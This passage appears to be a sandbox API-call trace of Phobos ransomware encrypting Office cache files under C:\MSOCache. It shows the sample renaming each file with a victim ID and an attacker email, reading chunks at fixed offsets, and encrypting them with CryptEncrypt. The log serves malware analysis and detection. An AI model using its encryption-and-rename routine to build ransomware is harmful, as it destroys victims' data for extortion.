lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0137.257] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0137.257] ReadFile (in: hFile=0x14c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0137.692] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa2e570) returned 1 [0137.692] CryptSetKeyParam (hKey=0xa2e570, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0137.692] CryptEncrypt (in: hKey=0xa2e570, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0137.698] CryptDestroyKey (hKey=0xa2e570) returned 1 [0137.698] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0137.698] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0137.712] SetEndOfFile (hFile=0x14c) returned 1 [0137.713] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0137.713] WriteFile (in: hFile=0x14c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0137.714] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0137.714] WriteFile (in: hFile=0x14c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0137.718] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0137.718] WriteFile (in: hFile=0x14c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0137.719] CloseHandle (hObject=0x14c) returned 1 [0138.758] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0138.758] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0138.759] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2513920) returned 1 [0138.759] CloseHandle (hObject=0x14c) returned 1 [0138.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi")) returned 0x2020 [0138.759] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0138.759] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0138.759] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0138.759] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0138.759] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0138.797] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0138.797] ReadFile (in: hFile=0x14c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0138.916] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0138.916] ReadFile (in: hFile=0x14c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0139.008] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa2e408) returned 1 [0139.008] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0139.008] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0139.014] CryptDestroyKey (hKey=0xa2e408) returned 1 [0139.014] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0139.014] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0139.030] SetEndOfFile (hFile=0x14c) returned 1 [0139.031] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0139.031] WriteFile (in: hFile=0x14c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0139.033] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0139.033] WriteFile (in: hFile=0x14c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0139.036] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0139.037] WriteFile (in: hFile=0x14c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0139.038] CloseHandle (hObject=0x14c) returned 1 [0140.247] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0140.247] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0140.248] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=9958388) returned 1 [0140.248] CloseHandle (hObject=0x14c) returned 1 [0140.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab")) returned 0x2020 [0140.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0140.248] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0140.249] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0140.249] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0140.249] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0140.418] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0140.418] ReadFile (in: hFile=0x14c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0140.560] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0140.561] ReadFile (in: hFile=0x14c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0141.152] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32da8) returned 1 [0141.152] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0141.152] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050) returned 1 [0141.158] CryptDestroyKey (hKey=0xa32da8) returned 1 [0141.158] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0141.158] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0102, lpOverlapped=0x0) returned 1 [0141.174] SetEndOfFile (hFile=0x14c) returned 1 [0141.174] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0141.174] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0141.176] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0141.176] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0141.179] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0141.179] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0141.180] CloseHandle (hObject=0x14c) returned 1 [0144.037] SetEvent (hEvent=0xe8) returned 1 [0144.037] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0144.037] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0144.038] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=14819276) returned 1 [0144.038] CloseHandle (hObject=0x14c) returned 1 [0144.038] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab")) returned 0x2020 [0144.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0144.038] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0144.038] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0144.038] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0144.038] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0144.233] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0144.233] ReadFile (in: hFile=0x14c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0144.630] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0144.630] ReadFile (in: hFile=0x14c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0144.674] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa327e8) returned 1 [0144.674] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0144.674] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050) returned 1 [0144.680] CryptDestroyKey (hKey=0xa327e8) returned 1 [0144.680] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0144.680] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0102, lpOverlapped=0x0) returned 1 [0144.694] SetEndOfFile (hFile=0x14c) returned 1 [0144.695] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0144.695] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0144.696] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0144.696] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0144.697] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0144.697] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0145.000] CloseHandle (hObject=0x14c) returned 1 [0145.772] SetEvent (hEvent=0xe8) returned 1 [0145.772] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0145.772] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0145.773] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=43806141) returned 1 [0145.773] CloseHandle (hObject=0x14c) returned 1 [0145.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab")) returned 0x2020 [0145.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0145.775] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0145.775] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0145.775] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0145.775] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0147.012] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0147.012] ReadFile (in: hFile=0x14c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0147.026] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0147.026] ReadFile (in: hFile=0x14c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0147.073] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32da8) returned 1 [0147.073] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0147.073] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050) returned 1 [0147.079] CryptDestroyKey (hKey=0xa32da8) returned 1 [0147.079] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0147.079] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0102, lpOverlapped=0x0) returned 1 [0147.096] SetEndOfFile (hFile=0x14c) returned 1 [0147.096] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0147.096] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0147.102] SetFilePointerEx (in: 